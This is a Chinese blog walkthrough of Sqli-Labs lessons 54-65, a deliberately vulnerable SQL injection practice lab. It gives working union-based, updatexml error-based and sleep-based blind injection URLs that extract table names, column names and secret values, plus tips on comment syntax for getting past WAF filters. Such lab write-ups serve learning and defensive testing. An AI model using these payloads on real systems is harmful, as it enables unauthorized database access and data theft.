码迷,mamicode.com
首页 > 数据库 > 详细

Sqli-Labs less54-65

时间:2020-01-29 19:50:50      阅读:132      评论:0      收藏:0      [点我收藏+]

标签:过滤   abs   from   ret   select   判断   演示   就会   sql   

less-54

 从54关开始,就是提升巩固的关卡,并且开始慢慢偏向实际。

第54关就是对输入的次数做了限制,需要在十次之内获取信息,否则就会刷新表名列名等信息。

以下的步骤截图就直接从上帝视角截图说明了:

判断出数据格式为单引号包裹,然后判断列数:

http://192.168.0.105/sqli-labs/Less-54/?id=1‘  order by 3--+ 可知为三列:

技术图片

 

 查出当前数据库:http://192.168.0.105/sqli-labs/Less-54/?id=0‘  union  select 1,2,database()--+

技术图片

 

 爆出表名:http://192.168.0.105/sqli-labs/Less-54/?id=0‘ union select 1,2,(group_concat(table_name)) from information_schema.tables where table_schema =0x6368616c6c656e676573--+

技术图片

 

 然后得到列名:http://192.168.0.105/sqli-labs/Less-54/?id=0‘ union select 1,2,(group_concat(column_name)) from information_schema.columns where table_name =‘46i5jkx2ev‘ --+

技术图片

 

 取出数据:http://192.168.0.105/sqli-labs/Less-54/?id=0‘ union select 1,2,(group_concat( concat_ws(0x7e,sessid,secret_DHPM,tryy)  )) from challenges.46i5jkx2ev --+

技术图片

 

输入拿到的secret:

技术图片

 

 通关完毕。

 

less-55

 

这次是14次。

数据格式变成id=(1),其他步骤均相同

 

less-56

数据格式变成id=(‘1’),其他步骤均相同

 

less-57

这次还是14次。

数据格式变成id=“1”,其他步骤均相同

 

less-58

 


本关不能使用联合查询,并且要求在5次之内获得数据。

使用报错注入:

获得表名:之前已经知道数据库的名字是challenges

http://192.168.0.105/sqli-labs/Less-58/?id=1‘ and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=‘CHALLENGES‘) ),1)--+

技术图片

 

 获取字段:http://192.168.0.105/sqli-labs/Less-58/?id=1‘ and updatexml(1,concat(0x7e,(select group_concat(column_name) from Information_schema.columns where table_name=‘4agntk4sfa‘ )),1)--+

 

技术图片

 

 获取字段的值:http://192.168.0.105/sqli-labs/Less-58/?id=1‘ and updatexml(1,concat(0x7e,(select group_concat(secret_IZV9) from challenges.ptji029en9 )),1)--+

技术图片

 

因为中间次数超了,重新开始了一下所以表名不一样。

 技术图片

 

 技术图片

 

 完成。

 

less-59

同样是使用报错注入,区别在于对id值得处理,id=1,就是没有包裹。

 

less-60 

同样是使用报错注入,区别在于对id值得处理,id=(“1”),他只给了五次机会,如果没有使用输出sql语句肯定五次之内猜不到发,所以多试几次可以的。

 

less-61 

同样是使用报错注入,区别在于对id值得处理,id=((‘1’)),他只给了五次机会,如果没有使用输出sql语句肯定五次之内猜不到发,所以多试几次可以的。

 

less-62

看到有130次机会就知道要盲注了。他题目中已经给出了数据库名,所以再猜解表名,字段名和值就可以了,这里简单演示:
http://192.168.0.105/sqli-labs/Less-62/?id=1‘) and if( left( (select table_name from information_schema.tables where table_schema=‘CHALLENGES‘ limit 0,1),1)> ‘a‘ ,1, sleep(5)) --+

技术图片

 

 

less-63

同样是延时注入,只是对于id值的处理不同:

SELECT * FROM security.users WHERE id=‘1‘ LIMIT 0,1

 

less-64

同样是延时注入,只是对于id值的处理不同:

SELECT * FROM security.users WHERE id=((1)) LIMIT 0,1

 

less-65

同样是延时注入,只是对于id值的处理不同:

 

SELECT * FROM security.users WHERE id=("1") LIMIT 0,1

 

 

 

总结:关于sqli-labs的通关结束。但是对于sql注入可能才是刚刚入门的水平,任重而道远~,下面再小小的总结一下知识点。

 

 

id或者sort闭合的方式:‘’、“”、()、(’‘)、(“”)、((’‘)),等等吧,根据不同的数据格式判断出不同sql闭合语句。

注释符:--+ --空 # %23  和;%00  有的WAF会使注释符过滤转义,所以需要多记几个

手工注入的几种姿势:报错注入、布尔盲注、时间盲注、读文件、写文件、堆叠注入、一句话木马等等等

 

Sqli-Labs less54-65

标签:过滤   abs   from   ret   select   判断   演示   就会   sql   

原文地址:https://www.cnblogs.com/hzk001/p/12239291.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!